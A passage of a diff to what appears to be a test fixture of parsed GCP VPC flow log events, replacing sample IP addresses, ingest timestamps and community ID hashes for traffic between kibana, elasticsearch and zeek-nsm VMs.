start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392288400Z", + "original": "{\"insertId\":\"19im82tfdygznh\",\"jsonPayload\":{\"bytes_sent\":\"14287\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458361534Z", "end": "2019-06-14T03:49:51.789258875Z", @@ -20155,18 +20155,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33550, "bytes": 59376, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 354 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5jhhJcbdl0291s4YJNbALw8uNfs=", + "community_id": "1:OALwlPDCqpn2fuHuxdc8nnkXpXM=", "bytes": 59376, "name": "default", "transport": "tcp", @@ -20188,7 +20188,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -20225,8 +20225,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869163900Z", - "original": "{\"insertId\":\"19im82tfdygzny\",\"jsonPayload\":{\"bytes_sent\":\"59376\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.496238286Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392292700Z", + "original": "{\"insertId\":\"19im82tfdygzny\",\"jsonPayload\":{\"bytes_sent\":\"59376\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.496238286Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.496238286Z", "end": "2019-06-14T03:49:59.565108649Z", @@ -20253,18 +20253,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33568, "bytes": 11214, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 120 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:0bB9/qzQDttOyEP0YcGU/tYSYIQ=", + "community_id": "1:cHbiBB9WtpuQHZE4rFxmPUo/X2c=", "bytes": 11214, "name": "default", "transport": "tcp", @@ -20286,7 +20286,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -20323,8 +20323,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869166600Z", - "original": "{\"insertId\":\"19im82tfdygzoe\",\"jsonPayload\":{\"bytes_sent\":\"11214\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"120\",\"reporter\":\"DEST\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392298500Z", + "original": "{\"insertId\":\"19im82tfdygzoe\",\"jsonPayload\":{\"bytes_sent\":\"11214\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"120\",\"reporter\":\"DEST\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.456732113Z", "end": "2019-06-14T03:49:51.789035952Z", @@ -20351,18 +20351,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53106, "bytes": 1763338, "domain": "zeek-nsm", - "ip": "198.51.100.88", + "ip": "67.43.156.14", "packets": 598 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:7XAVLIIXucPcO5qM8uynmx+KF7s=", + "community_id": "1:/j39rLoEcamlJFwzEQGPMQYhVds=", "bytes": 1763338, "name": "default", "transport": "tcp", @@ -20384,7 +20384,7 @@ }, "related": { "ip": [ - "198.51.100.88", + "67.43.156.14", "10.139.99.242" ] }, @@ -20421,8 +20421,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869169400Z", - "original": "{\"insertId\":\"19im82tfdygznn\",\"jsonPayload\":{\"bytes_sent\":\"1763338\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"198.51.100.88\",\"src_port\":53106},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"598\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392304100Z", + "original": "{\"insertId\":\"19im82tfdygznn\",\"jsonPayload\":{\"bytes_sent\":\"1763338\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53106},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"598\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.020290305Z", "end": "2019-06-14T03:49:56.401543207Z", @@ -20443,10 +20443,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -20460,7 +20460,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:m09Xemo/1QRUmAThg0ZtnVcAeS8=", + "community_id": "1:KsEQeDpJJQzBIT7y9/jnqOdwYak=", "bytes": 67239, "name": "default", "transport": "tcp", @@ -20483,7 +20483,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -20519,8 +20519,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869172Z", - "original": "{\"insertId\":\"19im82tfdygznl\",\"jsonPayload\":{\"bytes_sent\":\"67239\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392309600Z", + "original": "{\"insertId\":\"19im82tfdygznl\",\"jsonPayload\":{\"bytes_sent\":\"67239\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.146956782Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -20547,18 +20547,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 250327, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 247 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:A0Ohg3bqUresKEeBgZsLcFqEPRw=", + "community_id": "1:yyzV++A5KAdmyX88TOnGIQ8RV60=", "bytes": 250327, "name": "default", "transport": "tcp", @@ -20580,7 +20580,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -20617,8 +20617,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869174700Z", - "original": "{\"insertId\":\"19im82tfdygznv\",\"jsonPayload\":{\"bytes_sent\":\"250327\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392315200Z", + "original": "{\"insertId\":\"19im82tfdygznv\",\"jsonPayload\":{\"bytes_sent\":\"250327\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140109489Z", "end": "2019-06-14T03:49:59.565319136Z", @@ -20647,17 +20647,17 @@ "as": { "number": 4837 }, - "address": "192.0.2.12", + "address": "192.168.2.12", "port": 44128, "bytes": 0, - "ip": "192.0.2.12", + "ip": "192.168.2.12", "packets": 2 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:RFaj1p+IkzecdvmvndE30lJ6hLs=", + "community_id": "1:I5lhpPeiyo7KchAzF1nMGZkwF4k=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -20671,7 +20671,7 @@ }, "related": { "ip": [ - "192.0.2.12", + "192.168.2.12", "10.73.186.17" ] }, @@ -20693,8 +20693,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869177500Z", - "original": "{\"insertId\":\"19im82tfdygzoc\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.0.2.12\",\"src_port\":44128},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:22.318564382Z\",\"packets_sent\":\"2\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392319600Z", + "original": "{\"insertId\":\"19im82tfdygzoc\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.12\",\"src_port\":44128},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:22.318564382Z\",\"packets_sent\":\"2\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:22.080963433Z", "end": "2019-06-14T03:45:22.318564382Z", @@ -20715,10 +20715,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33542, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -20732,7 +20732,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VPSH6E9LDgDYoGyFDhfUPu+Qrzg=", + "community_id": "1:o987u+FKYcH8IEcaicIttd58P5M=", "bytes": 266531, "name": "default", "transport": "tcp", @@ -20755,7 +20755,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -20791,8 +20791,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869180200Z", - "original": "{\"insertId\":\"19im82tfdygzof\",\"jsonPayload\":{\"bytes_sent\":\"266531\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"253\",\"reporter\":\"SRC\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392324300Z", + "original": "{\"insertId\":\"19im82tfdygzof\",\"jsonPayload\":{\"bytes_sent\":\"266531\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"253\",\"reporter\":\"SRC\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150870105Z", "end": "2019-06-14T03:49:59.565108524Z", @@ -20819,18 +20819,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33560, "bytes": 65184, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 358 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:oxwQ2yjTxzJgTjy4DOGjIjbTugc=", + "community_id": "1:rl6P/BkNpx5wKW4KChF0WRwBicw=", "bytes": 65184, "name": "default", "transport": "tcp", @@ -20852,7 +20852,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -20889,8 +20889,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869182800Z", - "original": 